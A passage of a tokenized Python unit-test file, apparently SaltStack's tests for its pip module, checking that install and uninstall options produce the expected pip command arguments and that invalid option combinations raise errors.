assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , mirrors [ <NUM_LIT:0> ] ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_with_multiple_find_links ( self ) : <EOL> find_links = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> pkg = '<STR_LIT>' <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in find_links : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> expected . append ( pkg ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = find_links ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = '<STR_LIT:U+002C>' . join ( find_links ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = find_links [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , find_links [ <NUM_LIT:0> ] , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . 
__salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , <EOL> '<STR_LIT>' + pkg + '<STR_LIT>' , <EOL> find_links = '<STR_LIT>' <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = find_links ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_index_with_index_url_or_extra_index_url_raises ( self ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , no_index = True , index_url = '<STR_LIT>' <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , no_index = True , extra_index_url = '<STR_LIT>' <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_failed_cached_requirements ( self , get_cached_requirements ) : <EOL> get_cached_requirements . return_value = False <EOL> ret = pip . install ( requirements = '<STR_LIT>' ) <EOL> self . assertEqual ( False , ret [ '<STR_LIT:result>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , ret [ '<STR_LIT>' ] ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_cached_requirements_used ( self , get_cached_requirements ) : <EOL> get_cached_requirements . return_value = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . 
install ( requirements = '<STR_LIT>' ) <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_venv ( self , mock_path ) : <EOL> mock_path . is_file . return_value = True <EOL> mock_path . isdir . return_value = True <EOL> pkg = '<STR_LIT>' <EOL> venv_path = '<STR_LIT>' <EOL> def join ( * args ) : <EOL> return '<STR_LIT:/>' . join ( args ) <EOL> mock_path . join = join <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , bin_env = venv_path ) <EOL> mock . assert_called_once_with ( <EOL> [ os . path . join ( venv_path , '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , pkg ] , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_log_argument_in_resulting_command ( self , mock_path ) : <EOL> pkg = '<STR_LIT>' <EOL> log_path = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , log = log_path ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , log_path , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_non_writeable_log ( self , mock_path ) : <EOL> pkg = '<STR_LIT>' <EOL> log_path = '<STR_LIT>' <EOL> mock_path . exists . 
side_effect = IOError ( '<STR_LIT>' ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> IOError , <EOL> pip . install , <EOL> pkg , <EOL> log = log_path <EOL> ) <EOL> def test_install_timeout_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> expected_prefix = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , timeout = <NUM_LIT:10> ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ <NUM_LIT:10> , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , timeout = '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> ValueError , <EOL> pip . install , <EOL> pkg , <EOL> timeout = '<STR_LIT:a>' <EOL> ) <EOL> def test_install_index_url_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> index_url = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , index_url = index_url ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , index_url , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_extra_index_url_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> extra_index_url = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , extra_index_url = extra_index_url ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , extra_index_url , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_index_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_index = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_build_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> build = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , build = build ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , build , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_target_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , target = target ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , target , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_download_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> download = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , download = download ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , download , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_download_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_download = True ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_download_cache_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> download_cache = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , download_cache = '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , download_cache , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_source_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> source = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , source = source ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , source , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_exists_action_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> for action in ( '<STR_LIT:s>' , '<STR_LIT:i>' , '<STR_LIT:w>' , '<STR_LIT:b>' ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( '<STR_LIT>' , exists_action = action ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , action , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , <EOL> pkg , <EOL> exists_action = '<STR_LIT:d>' <EOL> ) <EOL> def test_install_install_options_argument_in_resulting_command ( self ) : <EOL> install_options = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> pkg = '<STR_LIT>' <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in install_options : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> expected . append ( pkg ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , install_options = install_options ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , install_options = '<STR_LIT:U+002C>' . join ( install_options ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , install_options = install_options [ <NUM_LIT:0> ] ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> install_options [ <NUM_LIT:0> ] , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_global_options_argument_in_resulting_command ( self ) : <EOL> global_options = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> pkg = '<STR_LIT>' <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in global_options : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> expected . append ( pkg ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , global_options = global_options ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , global_options = '<STR_LIT:U+002C>' . join ( global_options ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , global_options = global_options [ <NUM_LIT:0> ] ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , global_options [ <NUM_LIT:0> ] , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_upgrade_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , upgrade = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_force_reinstall_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , force_reinstall = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_ignore_installed_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , ignore_installed = True ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_deps_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_deps = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_install_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_install = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_proxy_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> proxy = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , proxy = proxy ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , proxy , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_multiple_requirements_arguments_in_resulting_command ( self , get_cached_requirements ) : <EOL> cached_reqs = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> requirements = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in cached_reqs : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = requirements ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = '<STR_LIT:U+002C>' . join ( requirements ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = [ cached_reqs [ <NUM_LIT:0> ] ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = requirements [ <NUM_LIT:0> ] ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , cached_reqs [ <NUM_LIT:0> ] ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_uninstall_multiple_requirements_arguments_in_resulting_command ( self , get_cached_requirements ) : <EOL> cached_reqs = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> requirements = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in cached_reqs : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( requirements = requirements ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = cached_reqs <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( requirements = '<STR_LIT:U+002C>' . join ( requirements ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> get_cached_requirements . side_effect = [ cached_reqs [ <NUM_LIT:0> ] ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( requirements = requirements [ <NUM_LIT:0> ] ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , cached_reqs [ <NUM_LIT:0> ] ] , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_uninstall_proxy_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> proxy = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , proxy = proxy ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , proxy , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> cwd = None , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_uninstall_log_argument_in_resulting_command ( self , mock_path ) : <EOL> pkg = '<STR_LIT>' <EOL> log_path = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , log = log_path ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , log_path , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> cwd = None , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock_path . exists . side_effect = IOError ( '<STR_LIT>' ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> IOError , <EOL> pip . 
